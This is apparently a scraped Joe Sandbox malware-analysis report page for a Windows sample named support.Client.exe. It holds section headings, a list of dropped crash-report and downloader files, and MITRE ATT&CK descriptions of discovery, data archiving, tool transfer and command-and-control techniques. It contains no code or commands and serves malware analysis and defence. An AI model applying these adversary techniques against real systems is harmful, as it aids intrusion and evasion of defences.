Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report support.Client.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Privilege Escalation

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_support.Client.e_d4e091431b937769a4c20627e20536a24232_cff5f965_14ad0412-4421-4dfc-b2c2-d93d48ab241e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER925F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER934B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9379.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER937B.tmp.xml

Windows Analysis Report
support.Client.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre